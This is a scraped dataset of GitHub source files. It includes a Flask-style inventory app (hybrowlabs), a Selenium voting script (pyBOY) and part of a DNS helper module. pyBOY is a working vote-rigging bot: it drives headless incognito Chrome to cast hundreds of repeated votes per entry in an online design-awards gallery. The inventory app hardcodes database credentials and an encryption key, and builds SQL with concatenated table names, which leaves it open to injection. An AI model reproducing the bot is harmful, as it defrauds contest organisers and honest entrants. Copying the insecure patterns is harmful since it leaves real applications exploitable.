}\r\n\r\n }\r\n\r\ndata = {'data':'data'}\r\nxhr.send(JSON.stringify(data))\r\n}\r\n\r\ninit()\r\n\r\n\r\nfrom=document.getElementsByClassName('movement-from')\r\nfor(var i=0;i<from.length;i++){\r\n if(from[i].innerHTML==''){\r\n from[i].innerHTML='Nil'\r\n }\r\n}\r\n\r\n\r\nfrom=document.getElementsByClassName('movement-to')\r\nfor(var i=0;i<from.length;i++){\r\n if(from[i].innerHTML==''){\r\n from[i].innerHTML='Nil'\r\n }\r\n}"
},
{
"alpha_fraction": 0.4714285731315613,
"alphanum_fraction": 0.47380951046943665,
"avg_line_length": 26.758621215820312,
"blob_id": "13ed365be2aed47625310a00b89f3a86ce7ebb22",
"content_id": "68c6f7ec9640de3d46f18e40426ff237ccb87c1a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 840,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 29,
"path": "/api/signin.py",
"repo_name": "sankarsubramaniankvs/hybrowlabs",
"src_encoding": "UTF-8",
"text": "import mysql.connector\r\nfrom .crypto import cryptography as e\r\n\r\nclass user_signin:\r\n def authenticate_user(username,password):\r\n mydb = mysql.connector.connect(\r\n host=\"localhost\",\r\n user=\"administrator\",\r\n password=\"administrator\",\r\n database =\"hybrowlabs\"\r\n )\r\n\r\n cursor = mydb.cursor() \r\n cursor.execute(\"SELECT * FROM users\")\r\n users = cursor.fetchall()\r\n res=''\r\n for i in users:\r\n if username == e.decrypt(i[0]):\r\n r=e.check(password,i[1])\r\n if(r):\r\n res='success'\r\n break\r\n else:\r\n res='Password Incorrect!'\r\n else:\r\n res= 'username not found!'\r\n cursor.close()\r\n mydb.close()\r\n return res\r\n\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.6991404294967651,
"alphanum_fraction": 0.6991404294967651,
"avg_line_length": 21,
"blob_id": "2b3ca27bd3a35b12d2adfb6137ddfd11b16fc7fa",
"content_id": "ec617d8e6e3b820dcb42c67c6348358ace9fd2c5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 349,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 15,
"path": "/api/create_database.py",
"repo_name": "sankarsubramaniankvs/hybrowlabs",
"src_encoding": "UTF-8",
"text": "import mysql.connector\r\n\r\nmydb = mysql.connector.connect(\r\n host=\"localhost\",\r\n user=\"administrator\",\r\n password=\"administrator\"\r\n)\r\n\r\ncursor = mydb.cursor()\r\ncursor.execute(\"SHOW DATABASES\")\r\nprint(cursor)\r\n#creating database\r\nif 'hybrowlabs' not in cursor:\r\n cursor.execute(\"CREATE DATABASE hybrowlabs\")\r\n print('created successfully')\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.5653235912322998,
"alphanum_fraction": 0.5677655935287476,
"avg_line_length": 21.97058868408203,
"blob_id": "487cd5bede9862834c71b6c4b589ffcf5f365322",
"content_id": "60d5419d159f118dc16227ccc1b0394c721d8b0e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 819,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 34,
"path": "/api/crypto.py",
"repo_name": "sankarsubramaniankvs/hybrowlabs",
"src_encoding": "UTF-8",
"text": "import bcrypt \r\nfrom cryptography.fernet import Fernet\r\n\r\n\r\nclass cryptography:\r\n def hash(password):\r\n return bcrypt.hashpw(password.encode(),bcrypt.gensalt())\r\n \r\n\r\n def check(password,hash):\r\n return bcrypt.checkpw(password.encode(),hash) \r\n\r\n \r\n # def gen_key(self):\r\n # key = Fernet.generate_key()\r\n # print(key)\r\n\r\n def encrypt(item):\r\n key = b'kz6wJCv1egk9NgWTe8gQhptpQ-eSt6Jbf2JxtxquAW8='\r\n cipher_suite = Fernet(key)\r\n item = bytes(item,'utf-8')\r\n cipher_text = cipher_suite.encrypt(item)\r\n return cipher_text\r\n\r\n def decrypt(item):\r\n key = b'kz6wJCv1egk9NgWTe8gQhptpQ-eSt6Jbf2JxtxquAW8='\r\n cipher_suite = Fernet(key)\r\n plain_text = cipher_suite.decrypt(item) \r\n return plain_text.decode('utf-8')\r\n\r\n\r\n \r\n# c = cryptography()\r\n# print(c.check('password',b'$2b$12$fZEdY/7YbMKxxJqga9EUC.MjFizYM16jxh7U0V331UY6Qi7qfWiFe'))\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.5063660740852356,
"alphanum_fraction": 0.5141909718513489,
"avg_line_length": 41.6860466003418,
"blob_id": "a414be0ba1fc2f6921ed5a632d7bb4a1c00b0abf",
"content_id": "93f188755f969c90f5de5220b7e0ec02d37668cd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7540,
"license_type": "no_license",
"max_line_length": 212,
"num_lines": 172,
"path": "/api/movements.py",
"repo_name": "sankarsubramaniankvs/hybrowlabs",
"src_encoding": "UTF-8",
"text": "import mysql.connector \r\nimport datetime\r\nclass movement:\r\n def movement_edit(id,fr,to,pid,qty):\r\n mydb = mysql.connector.connect(\r\n host=\"localhost\",\r\n user=\"administrator\",\r\n password=\"administrator\",\r\n database =\"hybrowlabs\"\r\n )\r\n cursor = mydb.cursor() \r\n\r\n cursor.execute('SELECT * FROM movements WHERE id=%s OR id=%s',(id,id))\r\n current = cursor.fetchone() \r\n if fr!='':\r\n cursor.execute('SELECT quantity from '+fr +' WHERE product=%s OR product=%s',(pid,pid))\r\n r=cursor.fetchone()\r\n pq = r[0]\r\n quantity = int(pq)+int(current[5])-int(qty)\r\n cursor.execute('UPDATE '+fr+ ' SET QUANTITY=%s WHERE product=%s;',(quantity,pid))\r\n mydb.commit()\r\n if to!='':\r\n cursor.execute('SELECT quantity from '+to +' WHERE product=%s OR product=%s',(pid,pid))\r\n r=cursor.fetchone()\r\n pq = r[0]\r\n quantity = int(pq)-int(current[5])+int(qty)\r\n cursor.execute('UPDATE '+to+ ' SET QUANTITY=%s WHERE product=%s;',(quantity,pid))\r\n mydb.commit()\r\n\r\n sql = \"UPDATE movements SET from_loc=%s, to_loc=%s, product_id=%s, quantity=%s WHERE ID=%s\"\r\n val = (fr,to,pid,qty,id)\r\n cursor.execute(sql,val) \r\n mydb.commit()\r\n def movement_add(fr,to,product_id,quantity):\r\n timestamp=datetime.datetime.now()\r\n mydb = mysql.connector.connect(\r\n host=\"localhost\",\r\n user=\"administrator\",\r\n password=\"administrator\",\r\n database =\"hybrowlabs\"\r\n )\r\n cursor = mydb.cursor() \r\n cursor.execute(\"CREATE TABLE IF NOT EXISTS movements(id INT PRIMARY KEY, timestamp VARCHAR(40) NOT NULL, from_loc VARCHAR(40) NOT NULL, to_loc VARCHAR(40) NOT NULL,product_id VARCHAR(40), quantity INT);\")\r\n cursor.execute('SELECT * FROM movements;')\r\n r = cursor.fetchall()\r\n l = len(r)+1\r\n sql = \"INSERT INTO movements(id,timestamp,from_loc,to_loc,product_id,quantity) VALUES (%s,%s,%s,%s,%s,%s)\"\r\n val = (l,timestamp,fr,to,product_id,quantity)\r\n cursor.execute(sql,val)\r\n if(fr!=''):\r\n sql = \"CREATE TABLE IF NOT EXISTS \" + fr +\"(id INT PRIMARY KEY, product VARCHAR(40) NOT NULL, quantity INT);\"\r\n cursor.execute(sql)\r\n cursor.execute(\"SELECT * FROM \"+fr)\r\n r = cursor.fetchall() \r\n f=0\r\n for i in r:\r\n if i[1]==product_id:\r\n if int(i[2])<int(quantity):\r\n return 'Insufficient stock in From Location!'\r\n f=1\r\n\r\n if(f==0):\r\n return 'Product Not found in From Location!'\r\n else:\r\n cursor.execute('SELECT quantity from '+fr +' WHERE product=%s OR product=%s',(product_id,product_id))\r\n r=cursor.fetchone() \r\n if not r:\r\n cursor.execute('SELECT * FROM '+to)\r\n cursor.fetchall()\r\n id = cursor.rowcount +1\r\n cursor.execute('INSERT INTO '+fr+'(id,product,quantity) VALUES(%s,%s,%s)',(id,product_id,quantity))\r\n mydb.commit()\r\n else:\r\n pq = r[0]\r\n quantity1 = int(pq)-int(quantity)\r\n cursor.execute('UPDATE '+fr+ ' SET QUANTITY=%s WHERE product=%s;',(quantity1,product_id))\r\n mydb.commit()\r\n if(to!=''):\r\n sql = \"CREATE TABLE IF NOT EXISTS \" + to +\"(id INT PRIMARY KEY, product VARCHAR(40) NOT NULL, quantity INT);\"\r\n cursor.execute(sql) \r\n cursor.execute('SELECT quantity from '+ to +' WHERE product=%s OR product=%s;',(product_id,product_id))\r\n r=cursor.fetchone() \r\n if not r:\r\n cursor.execute('SELECT * FROM '+to)\r\n cursor.fetchall()\r\n id = cursor.rowcount +1\r\n cursor.execute('INSERT INTO '+ to +'(id,product,quantity) VALUES(%s,%s,%s)',(id,product_id,quantity))\r\n mydb.commit()\r\n else:\r\n pq = r[0]\r\n quantity = int(pq)+int(quantity)\r\n cursor.execute('UPDATE '+to+ ' SET QUANTITY=%s WHERE 
product=%s;',(quantity,product_id))\r\n mydb.commit()\r\n return 'Movement Added Successfully'\r\n\r\n def get_movements():\r\n mydb = mysql.connector.connect(\r\n host=\"localhost\",\r\n user=\"administrator\",\r\n password=\"administrator\",\r\n database =\"hybrowlabs\"\r\n )\r\n cursor = mydb.cursor() \r\n cursor.execute(\"CREATE TABLE IF NOT EXISTS movements(id INT PRIMARY KEY, timestamp VARCHAR(40) NOT NULL, from_loc VARCHAR(40) NOT NULL, to_loc VARCHAR(40) NOT NULL,product_id VARCHAR(40), quantity INT);\")\r\n cursor.execute('SELECT * FROM movements;')\r\n r=cursor.fetchall()\r\n return r \r\n\r\n def get(id):\r\n id=int(id)\r\n mydb = mysql.connector.connect(\r\n host=\"localhost\",\r\n user=\"administrator\",\r\n password=\"administrator\",\r\n database =\"hybrowlabs\"\r\n )\r\n cursor = mydb.cursor()\r\n sql = \"\"\"SELECT * FROM movements WHERE id=%s or id=%s\"\"\"\r\n val = (id,id)\r\n cursor.execute(sql,val)\r\n return cursor.fetchone() \r\n def movement_id_list():\r\n mydb = mysql.connector.connect(\r\n host=\"localhost\",\r\n user=\"administrator\",\r\n password=\"administrator\",\r\n database =\"hybrowlabs\"\r\n )\r\n cursor = mydb.cursor()\r\n cursor.execute('SELECT * FROM movements;')\r\n cursor.fetchall()\r\n return str(cursor.rowcount)\r\n def movement_delete(id):\r\n mydb = mysql.connector.connect(\r\n host=\"localhost\",\r\n user=\"administrator\",\r\n password=\"administrator\",\r\n database =\"hybrowlabs\"\r\n )\r\n cursor = mydb.cursor()\r\n cursor.execute(\"SELECT from_loc,to_loc,product_id,quantity FROM movements WHERE id=%s OR id=%s\",(id,id))\r\n res = cursor.fetchone() \r\n if res[0]!='':\r\n cursor.execute('SELECT quantity from '+res[0] +' WHERE product=%s OR product=%s',(res[2],res[2]))\r\n r=cursor.fetchone()\r\n pq = r[0]\r\n quantity = int(pq)+int(res[3])\r\n cursor.execute('UPDATE '+res[0]+ ' SET QUANTITY=%s WHERE product=%s;',(quantity,res[2]))\r\n mydb.commit()\r\n if res[1]!='':\r\n cursor.execute('SELECT quantity from '+res[1] +' WHERE product=%s OR product=%s',(res[2],res[2]))\r\n r=cursor.fetchone()\r\n pq = r[0]\r\n quantity = int(pq)-int(res[3])\r\n cursor.execute('UPDATE '+res[1]+ ' SET QUANTITY=%s WHERE product=%s;',(quantity,res[2]))\r\n mydb.commit()\r\n\r\n\r\n sql = \"DELETE FROM movements WHERE id=%s OR id=%s;\"\r\n val=(id,id)\r\n cursor.execute(sql,val)\r\n cursor.execute('SELECT * FROM movements;')\r\n data = cursor.fetchall() \r\n cursor.execute('TRUNCATE TABLE movements')\r\n d = 1 \r\n for i in data:\r\n sql = \"INSERT INTO movements(id,timestamp,from_loc,to_loc,product_id,quantity) VALUES (%s,%s,%s,%s,%s,%s);\"\r\n val = (d,i[1],i[2],i[3],i[4],i[5])\r\n cursor.execute(sql,val)\r\n d+=1\r\n mydb.commit()\r\n return 'success'\r\n \r\n\r\n\r\n "
},
{
"alpha_fraction": 0.70465487241745,
"alphanum_fraction": 0.70465487241745,
"avg_line_length": 22.038461685180664,
"blob_id": "6253a17bc63f1858fd1a12a7a4fb0eb965d02472",
"content_id": "a2663ec135550c28eaf74e4becde6253a919ce7f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 623,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 26,
"path": "/api/insert_user.py",
"repo_name": "sankarsubramaniankvs/hybrowlabs",
"src_encoding": "UTF-8",
"text": "import mysql.connector\r\nfrom crypto import cryptography as e\r\nmydb = mysql.connector.connect(\r\n host=\"localhost\",\r\n user=\"administrator\",\r\n password=\"administrator\",\r\n database =\"hybrowlabs\"\r\n)\r\n\r\ncursor = mydb.cursor() \r\ncursor.execute('CREATE TABLE IF NOT EXISTS users(username BLOB NOT NULL, password BLOB NOT NULL);')\r\n\r\n\r\nusername = 'administrator'\r\npassword = 'administrator'\r\n\r\nusername = e.encrypt(username)\r\npassword = e.hash(password)\r\n\r\nsql = \"INSERT INTO users(username, password) VALUES (%s,%s);\"\r\nval = (username, password)\r\ncursor.execute(sql,val)\r\n\r\nmydb.commit()\r\n\r\nprint(cursor.rowcount, \"record inserted.\")"
},
{
"alpha_fraction": 0.49673911929130554,
"alphanum_fraction": 0.5,
"avg_line_length": 32.149532318115234,
"blob_id": "8f61f83fccd1b83c933c83e41356a244ad8fffc2",
"content_id": "2d6b0f308b0ae3071c40d07f5ab16daa097fdff0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3680,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 107,
"path": "/api/products.py",
"repo_name": "sankarsubramaniankvs/hybrowlabs",
"src_encoding": "UTF-8",
"text": "import mysql.connector \r\n\r\nclass product:\r\n def product_edit(id,name):\r\n mydb = mysql.connector.connect(\r\n host=\"localhost\",\r\n user=\"administrator\",\r\n password=\"administrator\",\r\n database =\"hybrowlabs\"\r\n )\r\n cursor = mydb.cursor() \r\n sql = \"UPDATE products SET name=%s WHERE ID=%s\"\r\n val = (name,id)\r\n cursor.execute(sql,val) \r\n mydb.commit()\r\n def product_add(name):\r\n mydb = mysql.connector.connect(\r\n host=\"localhost\",\r\n user=\"administrator\",\r\n password=\"administrator\",\r\n database =\"hybrowlabs\"\r\n )\r\n cursor = mydb.cursor() \r\n cursor.execute(\"CREATE TABLE IF NOT EXISTS products(id INT PRIMARY KEY, name VARCHAR(40));\")\r\n cursor.execute('SELECT * FROM products;')\r\n r = cursor.fetchall()\r\n f=1\r\n for i in r:\r\n if i[1]==name:\r\n f=0\r\n break\r\n if(f):\r\n l = len(r)+1\r\n sql = \"INSERT INTO products(id,name) VALUES (%s,%s)\"\r\n val = (l,name)\r\n cursor.execute(sql,val)\r\n mydb.commit()\r\n return 'Product Added Successfully'\r\n else:\r\n return 'Product Exists!'\r\n\r\n def get_products():\r\n mydb = mysql.connector.connect(\r\n host=\"localhost\",\r\n user=\"administrator\",\r\n password=\"administrator\",\r\n database =\"hybrowlabs\"\r\n )\r\n cursor = mydb.cursor() \r\n cursor.execute('CREATE TABLE IF NOT EXISTS products(id INT PRIMARY KEY, name VARCHAR(40) NOT NULL);')\r\n cursor.execute('SELECT * FROM products;')\r\n r=cursor.fetchall()\r\n return r \r\n\r\n def get(id):\r\n id=int(id)\r\n mydb = mysql.connector.connect(\r\n host=\"localhost\",\r\n user=\"administrator\",\r\n password=\"administrator\",\r\n database =\"hybrowlabs\"\r\n )\r\n cursor = mydb.cursor()\r\n sql = \"\"\"SELECT * FROM products WHERE id=%s or id=%s\"\"\"\r\n val = (id,id)\r\n cursor.execute(sql,val)\r\n return cursor.fetchone() \r\n def product_id_list():\r\n mydb = mysql.connector.connect(\r\n host=\"localhost\",\r\n user=\"administrator\",\r\n password=\"administrator\",\r\n database =\"hybrowlabs\"\r\n )\r\n cursor = mydb.cursor()\r\n cursor.execute('SELECT * FROM products;')\r\n cursor.fetchall()\r\n return str(cursor.rowcount)\r\n def product_delete(id):\r\n mydb = mysql.connector.connect(\r\n host=\"localhost\",\r\n user=\"administrator\",\r\n password=\"administrator\",\r\n database =\"hybrowlabs\"\r\n )\r\n cursor = mydb.cursor()\r\n cursor.execute('SELECT name FROM products WHERE id=%s OR id=%s;',(id,id))\r\n pname = cursor.fetchone() \r\n cursor.execute('SELECT name FROM locations;')\r\n locations = cursor.fetchall()\r\n for i in locations:\r\n cursor.execute('DELETE FROM '+ i[0]+' WHERE product=%s or product=%s',(pname,pname))\r\n mydb.commit()\r\n sql = \"DELETE FROM products WHERE id=%s OR id=%s;\"\r\n val=(id,id)\r\n cursor.execute(sql,val)\r\n cursor.execute('SELECT * FROM products;')\r\n data = cursor.fetchall() \r\n cursor.execute('TRUNCATE TABLE products')\r\n d = 1 \r\n for i in data:\r\n sql = \"INSERT INTO products(id,name) VALUES(%s,%s);\"\r\n val = (d,i[1])\r\n cursor.execute(sql,val)\r\n d+=1\r\n mydb.commit()\r\n return 'success'\r\n \r\n\r\n\r\n "
},
{
"alpha_fraction": 0.6099726557731628,
"alphanum_fraction": 0.6113387942314148,
"avg_line_length": 31.953489303588867,
"blob_id": "9282cc157356cee8c06aba45ee8575cc52c23cfe",
"content_id": "c099dc4b82f131defb84dc1f05b35c8719c76049",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1464,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 43,
"path": "/static/login.js",
"repo_name": "sankarsubramaniankvs/hybrowlabs",
"src_encoding": "UTF-8",
"text": "document.addEventListener('keypress',function(event){\r\n if(event.keyCode==13){\r\n // console.log('clicked');\r\n username = document.getElementById('username').value \r\n password = document.getElementById('password').value \r\n const user = {username: username, password:password} \r\n var xhr = new XMLHttpRequest();\r\n xhr.open('POST','/auth',true);\r\n xhr.setRequestHeader('Content-type', 'application/json');\r\n xhr.onload = function () {\r\n r = this.responseText\r\n if(r=='success'){\r\n console.log('redirect call')\r\n window.location = \"/loginredirect\"\r\n }\r\n else{\r\n document.getElementById('auth').innerHTML=r;\r\n }\r\n };\r\n xhr.send(JSON.stringify(user))\r\n}\r\n});\r\n\r\ndocument.getElementById('login-button').addEventListener('click', ()=>{\r\n username = document.getElementById('username').value \r\n password = document.getElementById('password').value \r\n const user = {username: username, password:password} \r\n var xhr = new XMLHttpRequest();\r\n xhr.open('POST','/auth',true);\r\n xhr.setRequestHeader('Content-type', 'application/json');\r\n xhr.onload = function () {\r\n // do something to response\r\n r = this.responseText\r\n if(r=='success'){\r\n console.log('redirect call')\r\n window.location = \"/loginredirect\"\r\n }\r\n else{\r\n document.getElementById('auth').innerHTML=r;\r\n }\r\n };\r\n xhr.send(JSON.stringify(user))\r\n});\r\n\r\n\r\n"
}
] | 18 |
deshudiosh/pyBOY | https://github.com/deshudiosh/pyBOY | d44d031dd862701617371731b76d3ce03aec9b0c | 5da7269840a42c1bf86a0be2478eac4c6a94da2f | 7b599fb2349dff97098d3cb2a34f67c523ac318e | refs/heads/master | 2021-07-11T16:50:23.219686 | 2017-10-17T09:11:30 | 2017-10-17T09:11:30 | 106,881,031 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.521789014339447,
"alphanum_fraction": 0.6217507719993591,
"avg_line_length": 94.09091186523438,
"blob_id": "ea9c5db77ac3ea0b9bd2d717bcf762a29aebc3fe",
"content_id": "fd60ccb836ca88940960939533ac56594dfff5ed",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5232,
"license_type": "no_license",
"max_line_length": 158,
"num_lines": 55,
"path": "/vote_for_list.py",
"repo_name": "deshudiosh/pyBOY",
"src_encoding": "UTF-8",
"text": "list = [[\"Harmony in Motion\", \"Wall Covering: Contract\", \"https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/10916\", 1080],\n [\"Tauko Stool\", \"Seating: Residential/Stool\",\"https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/10268\", 280],\n [\"Hybrid Collection Mesh Pattern \", \"Materials, Treatments and Surfaces\",\"https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/10760\", 662],\n [\"Drum Teen\", \"Seating: Residental/Accent\",\"https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/8545\", 850],\n [\"Tauko Modular Table\", \"Furniture: Contract/Tables\", \"https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/10104\", 762],\n [\"Tauko Modular Table\", \"Furniture: Education\", \"https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/10262\", 338],\n [\"Harmony in Motion\", \"Wall Covering: Paper\", \"https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/9569\", 174],\n [\"Tapa\", \"Seating: Contract/Lounge\", \"https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/10270\", 558],\n [\"River Snake\", \"Furniture: Outdoor\", \"https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/7775\", 550]]\n\nothers = [['3', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/10649', 400],\n ['4', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/10503', 400],\n ['5', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/9606', 400],\n ['6', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/9864', 400],\n ['7', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/10074', 400],\n ['8', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/10934', 400],\n ['9', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/10604', 400],\n ['10', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/8237', 400],\n ['11', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/9110', 400],\n ['12', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/9491', 400],\n ['13', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/9618', 400],\n ['14', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/7677', 400],\n ['15', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/10057', 400],\n ['16', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/8170', 400],\n ['17', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/9637', 400],\n ['18', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/8749', 400],\n ['19', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/10138', 400],\n ['20', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/10697', 400],\n ['21', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/8223', 400],\n ['22', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/10559', 400],\n ['23', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/10050', 400],\n ['24', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/9443', 400],\n ['25', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/8175', 400],\n ['26', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/7523', 400],\n ['27', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/9839', 400],\n ['28', '', 
'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/9667', 400],\n ['29', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/10690', 400],\n ['30', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/8771', 400],\n ['31', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/10930', 400],\n ['32', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/10428', 400],\n ['33', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/9837', 400],\n ['34', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/11154', 400],\n ['35', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/9431', 400],\n ['36', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/9430', 400],\n ['37', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/10239', 400],\n ['38', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/7658', 400],\n ['39', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/9837 ', 400],\n ['40', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/8170', 400]]\n\n\ntest_list = [[\"nazwa\", \"categoria\", \"url\", 1],\n [\"nazwa2\", \"categoria2\", \"url2\", 2]]\n\ndef get_project_list():\n return [{\"name\": e[0], \"category\": e[1], \"url\": e[2], \"num_iter\": e[3]} for e in others]\n\n\n"
},
{
"alpha_fraction": 0.718068540096283,
"alphanum_fraction": 0.7196261882781982,
"avg_line_length": 30.317073822021484,
"blob_id": "4ef0391047c5163d75808256586e382a02e8db2d",
"content_id": "f76aaa04f0923d9358c73cfc02cfb9fb59db89c8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1284,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 41,
"path": "/pyBOY.py",
"repo_name": "deshudiosh/pyBOY",
"src_encoding": "UTF-8",
"text": "from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.wait import WebDriverWait\n\nimport count_check\nimport logger\nimport vote_for_list\n\nchrome_options = webdriver.ChromeOptions()\nchrome_options.add_argument(\"--incognito\")\nchrome_options.add_argument(\"--disable-gpu\")\nchrome_options.add_argument(\"--log-level=3\")\nchrome_options.add_argument(\"--headless\")\n\n\ndef loop(project:dict):\n driver = webdriver.Chrome(executable_path=\"./chromedriver.exe\", chrome_options=chrome_options)\n driver.get(project[\"url\"])\n\n try:\n driver.find_element_by_class_name(\"confirmVote\").click()\n WebDriverWait(driver, 5).until(EC.presence_of_element_located((By.CLASS_NAME, \"voteComplete\")))\n logger.success(project)\n except:\n logger.fail(project)\n\n driver.close()\n\n #TODO: count successes on file copy (so write acces wont fail in logs_counter)\n counted_successes = count_check.get_success_num(project[\"url\"])\n print(counted_successes, \"/\", project[\"num_iter\"])\n\n if counted_successes < project[\"num_iter\"]:\n loop(project)\n else:\n print(\"Finished!\")\n\n\nfor project in vote_for_list.get_project_list():\n loop(project)\n"
},
{
"alpha_fraction": 0.6517857313156128,
"alphanum_fraction": 0.6517857313156128,
"avg_line_length": 28.130434036254883,
"blob_id": "489195333e45b7df0490758a09f0d4b854c5a013",
"content_id": "6e163cf2ec2c4d747b0ffeca62af232eb5eaeafc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 672,
"license_type": "no_license",
"max_line_length": 151,
"num_lines": 23,
"path": "/logger.py",
"repo_name": "deshudiosh/pyBOY",
"src_encoding": "UTF-8",
"text": "import datetime\nimport os\nimport tempfile\n\n\ndef make_log_file(project:dict, success):\n dir = \"./logs\"\n if not os.path.exists(dir):\n os.makedirs(dir)\n file = tempfile.NamedTemporaryFile(dir=dir, delete=False, mode=\"w\")\n file.write(\"\\n\".join([project[\"url\"], str(success), project[\"name\"], project[\"category\"]]))\n file.close()\n\n t = datetime.datetime.now()\n print(\" > \".join([\":\".join([str(t.hour), str(t.minute), str(t.second)]), project[\"name\"],project[\"category\"], (\"success\" if success else \"fail\")]))\n\n\ndef success(project:dict):\n make_log_file(project, success=True)\n\n\ndef fail(project:dict):\n make_log_file(project, success=False)\n\n\n"
}
] | 3 |
fastlorenzo/Shepherd | https://github.com/fastlorenzo/Shepherd | 26d809e3471de3c2ef10210dc550b39a5b7f118b | a51235ecae63f64dc9b5796b7a7a4c544ce58753 | 62db52e196891cfba080bdda8d343c16b20f68da | refs/heads/master | 2020-06-25T02:10:45.348204 | 2019-07-27T13:12:31 | 2019-07-27T13:12:31 | 199,166,282 | 1 | 0 | null | 2019-07-27T13:08:35 | 2019-07-15T07:12:46 | 2019-01-24T18:04:03 | null | [
{
"alpha_fraction": 0.6308540105819702,
"alphanum_fraction": 0.6330578327178955,
"avg_line_length": 33.24528121948242,
"blob_id": "3c30248eb8e8b0a2c126a0addb80ee9afd8c1c03",
"content_id": "da0d15edd7095e4805d14d5eee3d1fac85182a8f",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1815,
"license_type": "permissive",
"max_line_length": 98,
"num_lines": 53,
"path": "/modules/dns.py",
"repo_name": "fastlorenzo/Shepherd",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"This module contains the tools required for collecting and parsing DNS records.\"\"\"\n\nimport dns.resolver\nfrom catalog.models import Domain\n\n\nclass DNSCollector(object):\n \"\"\"Class to retrieve DNS records and perform some basic analysis.\"\"\"\n # Setup a DNS resolver so a timeout can be set\n # No timeout means a very, very long wait if a domain has no records\n resolver = dns.resolver.Resolver()\n resolver.timeout = 1\n resolver.lifetime = 1\n\n def __init__(self):\n \"\"\"Everything that should be initiated with a new object goes here.\"\"\"\n pass\n\n def get_dns_record(self, domain, record_type):\n \"\"\"Collect the specified DNS record type for the target domain.\n\n Parameters:\n domain The domain to be used for DNS record collection\n record_type The DNS record type to collect\n \"\"\"\n answer = self.resolver.query(domain, record_type)\n return answer\n\n def parse_dns_answer(self, dns_record):\n \"\"\"Parse the provided DNS record and return a list containing each item.\n\n Parameters:\n dns_record The DNS record to be parsed\n \"\"\"\n temp = []\n for rdata in dns_record.response.answer:\n for item in rdata.items:\n temp.append(item.to_text())\n return \", \".join(temp)\n\n def return_dns_record_list(self, domain, record_type):\n \"\"\"Collect and parse a DNS record for the given domain and 